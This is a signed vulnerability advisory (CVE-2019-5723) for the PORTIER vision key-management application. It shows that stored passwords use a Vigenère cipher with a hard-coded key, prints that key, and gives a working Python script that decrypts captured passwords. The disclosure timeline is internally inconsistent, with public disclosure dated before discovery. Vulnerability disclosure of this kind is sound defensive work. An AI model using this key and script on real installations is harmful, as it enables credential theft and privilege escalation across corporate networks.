-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2018-011 Product: PORTIER Affected Version(s): 4.4.4.2, 4.4.4.6 Tested Version(s): 4.4.4.2, 4.4.4.6 Vulnerability Type: Cryptographic Issues (CWE-310) Risk Level: HIGH Solution Status: Open Manufacturer Notification: 2018-06-13 Solution Date: - Public Disclosure: 2018-01-09 CVE Reference: CVE-2019-5723 Author of Advisory: Christian Pappas, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: portier vision is a rich client application for managing door keys allocated to certain persons or group of persons. The manufacturer describes the product as follows (see [1]): "portier® vision * manages locking systems and access rights in a modern and efficient manner * stores all the details for every single key * provides you lightning fast with all the information you need in a format you choose portier ®vision easy - secure - fast, our idea of software." Passwords are stored encrypted rather than as a hash value and the used Vigenère algorithm is badly outdated. Moreover, the keyword is static and quite too short. Due to this, the passwords stored by the application can be easily decrypted. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Both user passwords in the database and the password for the database itself in the 'portiervision.ini' configuration file are stored reversible encrypted. The enforced password policy requires at least 1 up to 15 character long passwords. The passwords are encrypted by a Vigenère cipher, which is a series of interwoven Caesar ciphers based on the characters of the keyword. In this particular application, the keyword is static and 15 bytes long. Static means, in this special case, hard coded. Once an attacker has access to the encrypted passwords, he or she can easily decrypt these and, thereby, escalate his or her privileges. As decrypting the user passwords the privilege escalation is obviously limited to the application. But because the same keyword is reused for encrypting the database password, attackers might go beyond this point and try out these credentials to take over control of other systems in the corporate network. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof-of-Concept (PoC): To break the encryption and derive the keyword, the following list of pairs of plain-text and encrypted passwords is analyzed: #n plain-text password encrypted password 1 A d 2 AA dI 3 AAA dIo 4 AAAA dIo: 5 AAAAAAAA dIo:iO95 6 AAAAAAAAAAAAAAA dIo:iO95>O1+qtm 7 BBBBBBBBBBBBBBB eJp;jP:6?P2,run 8 CCCCCCCCCCCCCCC fKq<kQ;7@Q3-svo 9 DDDDDDDDDDDDDDD gLr=lR<8AR4.twp 10 YYYYYYYYYYYYYYY !a,R&gQMVgIC.1* 11 ZZZZZZZZZZZZZZZ "b-S'hRNWhJD/2+ 12 aaaaaaaaaaaaaaa )i4Z.oYU^oQK692 13 bbbbbbbbbbbbbbb *j5[/pZV_pRL7:3 14 ABCDEFGHIJKLMNO dJq=mT?<FX;6"& 15 ONMLKJIHGFEDCBA rV EsXA<DT5.sum The length of the encrypted password equals the length of the plain-text password. Thus, no block ciphers could be in use. Because of an equidistant offset of the ASCII representation of m consecutive pairs of plain-text and encrypted passwords, it is assumed that a static key is used. The temporary key candidate is a list of offsets of the ASCII representation of the encrypted password in decimal notation: #n temporary key candidate 6, 7, 8, 9, 15 [-35, -8, -46, 7, -40, -14, 8, 12, 3, -14, 16, 22, -48, -51, -44] 10, 11, 12, 13 [ 56, -8, 45, 7, 51, -14, 8, 12, 3, -14, 16, 22, 43, 40, 47] 14 [-35, -8, -46, 7, -40, -14, 8, 12, 3, -14, 16, 22, 43, 40, 47] The difference between the offsets of each temporary key candidate to the others is always 91, so the static key has to be the following: [-35, -8, -46, 7, -40, -14, 8, 12, 3, -14, 16, 22, -48, -51, -44] The first printable ASCII character is the space. Its decimal value is 32. But the application does not accept spaces in the password. Therefore, the effective first character has the decimal value 33. This results in the following Python script for decrypting the passwords: #!/bin/python import sys static_key = [-35, -8, -46, 7, -40, -14, 8, 12, 3, -14, 16, 22, -48, -51, -44] encrypted_password = list(sys.argv[1]) key = static_key[:len(encrypted_password)] plain-text_password = list() for i in range(len(encrypted_password)): decrypted_character = (ord(encrypted_password[i]) - 33 + key[i] + 91) % 91 + 33 plain-text_password.append(chr(decrypted_character)) print("Decrypted password: " + "".join(plain-text_password)) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Store user passwords only as a hash value. Therefore, a suitable cryptographic hashing algorithm like PBKDF2 or bcrypt should be chosen. As it comes to the implementation, it should be made use of well-known libraries or operating system services. SySS GmbH is not aware of a solution to the reported security issue provided by the manufacturer. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2018-05-23: Vulnerability discovered 2018-06-13: Vulnerability reported to manufacturer 2018-01-09: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for PORTIER https://portier.de/ [2] SySS Security Advisory SYSS-2018-011 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-011.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Christian Pappas of SySS GmbH. E-Mail: christian.pappas@xxxxxxx Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Pappas.asc Key ID: 0xC5D4E3BA8BA76B25 Key Fingerprint: 5655 FDBE 40DF 0CC4 F143 9877 C5D4 E3BA 8BA7 6B25 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEEVlX9vkDfDMTxQ5h3xdTjuounayUFAlw18kUACgkQxdTjuoun ayUWtAgAiFGSaRBx3GA1VCzpKFitumz8kE3lEmvAS8AxL4jXns/Xaa9+U+5lJxCb Q6TguxeJxBY3ZB4Y4JOWDRlzl5YQxDP0KEa/Z5L4u0Xb1q+2kdSbtN97WheZDwPs RoB8hJzsEi/a2GcRDmEj/blZmcPdll9L8nRa/vAFTrgkmtS97DEQ3woP6c0P0+sg AlzD3UVgshB8+ar0IyKiFSht+bDWs5nvyXHPaC+Qc7kokkztHtuorUtbcVjm+W1h 2Seqxa2ad2f766F6pmn+GLehdSl8XFr5fcwqGRMvHv7OgvSL13ID2OXN0uqLy4du ddVdSLD530mdqs+IXTjCKoflIdnKPg== =bPfI -----END PGP SIGNATURE-----